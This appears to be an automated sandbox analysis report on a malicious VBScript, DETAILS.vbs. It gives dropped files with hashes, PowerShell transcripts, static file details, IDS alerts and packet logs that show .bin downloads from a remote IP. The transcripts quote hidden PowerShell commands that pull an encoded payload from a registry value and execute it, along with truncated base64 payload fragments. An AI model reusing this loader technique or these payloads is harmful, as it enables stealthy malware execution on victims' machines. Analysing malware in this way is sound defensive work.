C:\Users\user\AppData\Local\Temp\vybs2gqu.cmdline Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	353
Entropy (8bit):	5.27600376148969
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23fvzxs7+AEszICN23fqn:p37Lvkmb6Km3WZE7yn
MD5:	124F0E3E1FE5E1329939F92911373156
SHA1:	F54C73C2AFB6DAC4EB731A43245A2270CC25FCD7
SHA-256:	A0B3B2DDB218D50C61543369045919C84488761E282358F2919734D856CE6DF2
SHA-512:	4E19E7E6F198FF73DE03D98855BB180A70D02352F87D6E15EB399B6A469E2F708B2D6A14D67D4F1C71CB4F16DD884E99C0B22F8BE4696BB19291F3FA1AB32CD3
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vybs2gqu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vybs2gqu.0.cs"

C:\Users\user\AppData\Local\Temp\vybs2gqu.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	3.201260343371045
Encrypted:	false
SSDEEP:	24:etGSgtoDTc8cF7ertlCLxS0uv0lojsxptkFbN9JJsoWI+ycuZhN7BakS6mPNnq:6lPvc0gLHlojCkFx9JJsD1ulFa3Zq
MD5:	A1FEA2BA74764451A0759733DAF453D4
SHA1:	925845BC967A63C8C0798A286C7DB5FFDDA85AFF
SHA-256:	3A35FAE5878251D07446F9A3D085C79B032EF8764CE816D1A59F019809C3DF21
SHA-512:	33E4BD47A3D557A75AEAB31064E61646AD247BCD74EE8F6F5100CE907B8FA622373C5390F1EEF6FB2771208609FF63BAFFBE54C0497D01B886AEDFFFB5961756
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../s.a...........!................^%... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@%......H.......P ..............................................................BSJB............v4.0.30319......l.......#~.. .......#Strings....<.......#US.D.......#GUID...T...l...#Blob...........G.........%3............................................................2.+...{.[.....[.......................................... 9............ Q............ ].!.......... f.+.......v...........................................................................................................$.

C:\Users\user\AppData\Local\Temp\vybs2gqu.out Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
Category:	modified
Size (bytes):	871
Entropy (8bit):	5.352160451921584
Encrypted:	false
SSDEEP:	24:7rqd3ka6KmkE7rKax5DqBVKVrdFAMBJTH:/ika6PkE7rK2DcVKdBJj
MD5:	F4657BFD15F61C604C950752FE29DCD3
SHA1:	C9313A4F0B1BB826FA068874E99837643D6AFFEC
SHA-256:	59D5EE4BF8103A9A771C23F279F4188894D12515E5DE3B49539ED3259086E8D6
SHA-512:	207B17BF04FBD68787F144DFF1B3DC7926D316559BE9D72675EB64E7D20832318C196BDD83879335FF39F72CC8158EF9D7172177E9E1225DDFA6A88AB9A1D581
Malicious:	false
Preview:	.C:\windows\SysWOW64\WindowsPowerShell\v1.0> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vybs2gqu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vybs2gqu.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CPE4ML5E19SATFFMY0CN.temp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.7372369210703513
Encrypted:	false
SSDEEP:	96:IOOtrhCDGhiukvhkvCCtWYYfqhHVYYfqhHI:3OtH5WYYSfYYSi
MD5:	B6E97E4D172009D9210EBD8E171D8588
SHA1:	3D17E6B0A7655791BC39EA39CCDAE5030E876C9C
SHA-256:	1311006F62164F8B031F56D09F6CBD950891FB1468FAB7360265658B6FD81DD5
SHA-512:	262FF1DE8BD4F7F3FA80ABEF22A4194628B6D7B79BDE257F6680EF449F6B5D3BC5ACCA0845CB48F5B4D82F99CD151534B2B677852FDD62464685D53604FAA245
Malicious:	false
Preview:	...................................FL..................F.".. ...;.}.S...k.]g....z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...?.=......6(S........t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.yS)[....B......................A!.A.p.p.D.a.t.a...B.V.1....."S...Roaming.@......"S.yS)[....D.........................R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.yS)[....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....yS&S..Windows.@......"S.yS)[....F......................{Z.W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`yS[....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`yS[....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.yS3P....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.6S.R....i...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T8MESU3T7X76FA8UZPP9.temp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.738691144456782
Encrypted:	false
SSDEEP:	96:IpOtrhCDGkukvhkvCCtWYYfqhHVYYfqhHI:0OtHVWYYSfYYSi
MD5:	D5297386A5BBB551709D3AF9D0044E42
SHA1:	A7EB03943DBF38B9BF98968E99E26FA94BB332E1
SHA-256:	431ECD8C8837BD30BC97E8BCF0BD6E165E957E5641D64D8E8304B5F0881A7F96
SHA-512:	1DBBA5957894BE6EDB0FEDBC4AE2118D23D1A6799CF639B06CD71A65CEC2A8CF515F121DEC850B540B749B91006984A366ECA711C5C29696DBCF168647F5DB17
Malicious:	false
Preview:	...................................FL..................F.".. ...;.}.S...k.]g....z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...?.=........W........t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.yS)[....B......................A!.A.p.p.D.a.t.a...B.V.1....."S...Roaming.@......"S.yS)[....D.........................R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.yS)[....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....yS&S..Windows.@......"S.yS)[....F......................{Z.W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`yS[....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`yS[....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.ySV[....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.6S.R....i...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy) Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.738691144456782
Encrypted:	false
SSDEEP:	96:IpOtrhCDGkukvhkvCCtWYYfqhHVYYfqhHI:0OtHVWYYSfYYSi
MD5:	D5297386A5BBB551709D3AF9D0044E42
SHA1:	A7EB03943DBF38B9BF98968E99E26FA94BB332E1
SHA-256:	431ECD8C8837BD30BC97E8BCF0BD6E165E957E5641D64D8E8304B5F0881A7F96
SHA-512:	1DBBA5957894BE6EDB0FEDBC4AE2118D23D1A6799CF639B06CD71A65CEC2A8CF515F121DEC850B540B749B91006984A366ECA711C5C29696DBCF168647F5DB17
Malicious:	false
Preview:	...................................FL..................F.".. ...;.}.S...k.]g....z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...?.=........W........t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.yS)[....B......................A!.A.p.p.D.a.t.a...B.V.1....."S...Roaming.@......"S.yS)[....D.........................R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.yS)[....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....yS&S..Windows.@......"S.yS)[....F......................{Z.W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`yS[....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`yS[....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.ySV[....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.6S.R....i...........

C:\Users\user\Documents\20211125\PowerShell_transcript.216041.5JIK3KS8.20211125112652.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1239
Entropy (8bit):	5.225850682287475
Encrypted:	false
SSDEEP:	24:BxSAu/wOvMOx2DOz04z3I/WBljexKKzX4CIym1ZJXm2R3IYEGnxSAZzEi:BZuYOvMOoOqeBUzYB1ZQr8ZZ5
MD5:	872F65E9B7D49EC05E7ED53425B728CD
SHA1:	794B8834C35BED612C76856A6B4E30B2C640FF99
SHA-256:	0060C11888A848E6FBA378E9AC288922A3333277C606F277D76EBE42CFE1F92F
SHA-512:	75C41EFFE1B495CA139754AD30E4EB452BD7D51C4342AC9FEBBC412E6C9B7B2BEA8BF2ED4255AC1C9D807FE028781DC5ED00D5D74E096DDB3CF196381E4CD3EB
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20211125112652..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.19042.0)..Host Application: C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)..Process ID: 5176..PSVersion: 5.1.19041.1151..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1151..BuildVersion: 10.0.19041.1151..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20211125112652..********************..PS>$discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)..False..False..False

C:\Users\user\Documents\20211125\PowerShell_transcript.216041.AXD9vgjE.20211125112655.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	10708
Entropy (8bit):	5.152703732934866
Encrypted:	false
SSDEEP:	192:YzkBIv6PQW11Q4lGI7uvhYnbc71kC31elGZ0E2l6Ew9BkNno2JCEq:YzIA6PQg7GIqvhqcxkC3gGZ0E2l6Ew95
MD5:	5660969780E8E4DBEEA54687FC41653F
SHA1:	AE5CD70BC80DBC4505178363513F2C6331EEC4FF
SHA-256:	410FCD1DB633B51A28CF204D06BDED439A5CB18B208C50CA716955F4F62EACDD
SHA-512:	119164BF9012365D50A83928C43F5A45002DFAB2DFFD02414E66ADF983AAE29436FEABCC7DC05A6C25A5E00B71BBF4C10612A8F3D7E54CA451C0A09D51BB2209
Malicious:	false
Preview:	.**********************..Windows PowerShell transcript start..Start time: 20211125112711..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.19042.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAb

C:\Users\user\Documents\20211125\PowerShell_transcript.216041.VY6BGjMK.20211125112645.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1239
Entropy (8bit):	5.231784809167003
Encrypted:	false
SSDEEP:	24:BxSAuowOvMOx2DOz04z3I/WFljexKKzX4CIym1ZJXmlR3IJnxSAZ6:BZufOvMOoOqeFUzYB1ZQcNZZ6
MD5:	522AA5E24D517705D53F4EB6EC3A91CE
SHA1:	E23285962C8F06E3D69BFE5D1C352516AF22F410
SHA-256:	FCE0C3ACA274A65F8E93D46A0C685F3C045FD9F452D17D58EDE33F7AE701BF2F
SHA-512:	54D2705FA4FB1FC63132ABBDC732A78860FA317A3CFC3D207A6D2C661F562DD1D0F0D2F987D0F6A8B11B9D03A519EF21993C3C726997715DC70BD5817C63C133
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20211125112657..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.19042.0)..Host Application: C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)..Process ID: 2072..PSVersion: 5.1.19041.1151..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.1151..BuildVersion: 10.0.19041.1151..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20211125112657..********************..PS>$discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)..False..False..False

C:\Users\user\Documents\20211125\PowerShell_transcript.216041.V_8beKi2.20211125112712.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	10708
Entropy (8bit):	5.1529284468885495
Encrypted:	false
SSDEEP:	192:1zkBIv6PQW11Q4lGI7uvhYnbc71kC31elGZ0E2liEw9BkNno2JCEq:1zIA6PQg7GIqvhqcxkC3gGZ0E2liEw95
MD5:	9F065ADFBE0F0169D509FFFE4D6A12F6
SHA1:	19DFC522E4EFA456EEAD74518CC6EFB740F4397A
SHA-256:	7990786A984460C426430DC73571BF73094408980BA3409B5362EB8865715821
SHA-512:	6A1011B1B9E3D3D6457ED5EE903DD379C8EDD0DAE272D84D04D071CD51AEDE9F1E5AD1F52846DB4253501CBA5B62B85CBDC8CBA8D8DDE34333EDCE3F2857BAF4
Malicious:	false
Preview:	.**********************..Windows PowerShell transcript start..Start time: 20211125112730..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.19042.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAb

C:\Users\user\Documents\20211125\PowerShell_transcript.216041.jxZRzE3K.20211125112537.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	10688
Entropy (8bit):	5.151430974891507
Encrypted:	false
SSDEEP:	192:chzkBIv6PQW11Q4lGI7uvhYnbc71kC31elGZ0E2l3Ew9BkNno2JCEq:chzIA6PQg7GIqvhqcxkC3gGZ0E2l3Ewf
MD5:	DE704936F5BC03393F8EF2D65BD9011E
SHA1:	9F511D38FB7350995A1BA0C6782E24D627FB5ABE
SHA-256:	8AC0DCA91A5BA8E340397A2B61A1145EF340645AF7FD662E6389EE2936A95FCC
SHA-512:	9B09E1F991B70B0A177BC9E13467E99F9937AB5ACCAE14FC00A477AF7B74F2CF51F14EA9D898FF44A6140515981F1543BF6BF7BACC4B83EBB8FC42FDD41126E8
Malicious:	false
Preview:	.**********************..Windows PowerShell transcript start..Start time: 20211125112546..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.19042.0)..Host Application: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -EncodedCommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0A

Static File Info

General
File type:	ASCII text, with very long lines, with CRLF line terminators
Entropy (8bit):	4.87733386782629
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	DETAILS.vbs
File size:	191606
MD5:	6ece5dd9df7e2a34f492adc0c6184d81
SHA1:	f205057a0d17fab518a137e266335883a581289b
SHA256:	fc344554030bfb7f2ca7c79e99a5006f740c3c9f210dc38757c53537c9692f5e
SHA512:	6bcf854e39a17dcce66e2ce1af0abcc1bf7a47684334bb2ea57f6551aa9827fca6121710a2974b21c81b43717bd847f09ec64e0c9a2ed3f683f84e4372b2c538
SSDEEP:	3072:rUmlu432MxJ0yJfAEEsYYOnBsezxUwGDIBcl3EoQ5t:r0MsEByB19o3EoQ5t
File Content Preview:	'Folkvard2 kampuchea Overskygg1 DUALISMENP Mosekone2 HALVFJERD Staynilni9 bramse KULTURHUS TEKSTILING bikini RENTRYKSU Lyksaliggr syncho Bombni2 Valfa terminalf PALER Digtervrke5 skri hone ROCKENSROK Ggle Atomdrevne Stonehat DULCETLYIN TOSPROGET DRGLINES

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/25/21-11:26:34.720075	TCP	2018752	ET TROJAN Generic .bin download from Dotted Quad	49805	80	192.168.11.20	103.167.84.150
11/25/21-11:26:40.315539	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	51299	1.1.1.1	192.168.11.20
11/25/21-11:28:09.684592	TCP	2018752	ET TROJAN Generic .bin download from Dotted Quad	49808	80	192.168.11.20	103.167.84.150
11/25/21-11:28:24.364823	TCP	2018752	ET TROJAN Generic .bin download from Dotted Quad	49810	80	192.168.11.20	103.167.84.150

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 11:26:34.431046009 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:34.719544888 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:34.719908953 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:34.720074892 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.009077072 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.009140015 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.009188890 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.009236097 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.009287119 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.009341002 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.009433985 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.298674107 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.298763037 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.298827887 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.298888922 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.298950911 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.298980951 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.299012899 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.299046040 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.299076080 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.299140930 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.299185991 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.299237967 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.299312115 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.299344063 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.588371038 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.588582993 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.588740110 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.588788033 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.588843107 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.588876963 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.588890076 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.588937044 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.588947058 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.588984013 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.589021921 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.589030981 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.589078903 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.589126110 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.589148998 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.589171886 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.589189053 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.589220047 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.589266062 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.589267015 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.589318037 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.589345932 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.589359045 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.589407921 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.589513063 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.590317011 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.878021955 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.878261089 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.878276110 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.878375053 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.878431082 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.878477097 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.878484964 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.878540039 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.878592968 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.878647089 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.878648043 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.878695011 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.878700972 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.878707886 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.878756046 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.878810883 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.878845930 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.878865004 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.878902912 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:26:35.878920078 CET	80	49805	103.167.84.150	192.168.11.20
Nov 25, 2021 11:26:35.878973961 CET	80	49805	103.167.84.150	192.168.11.20
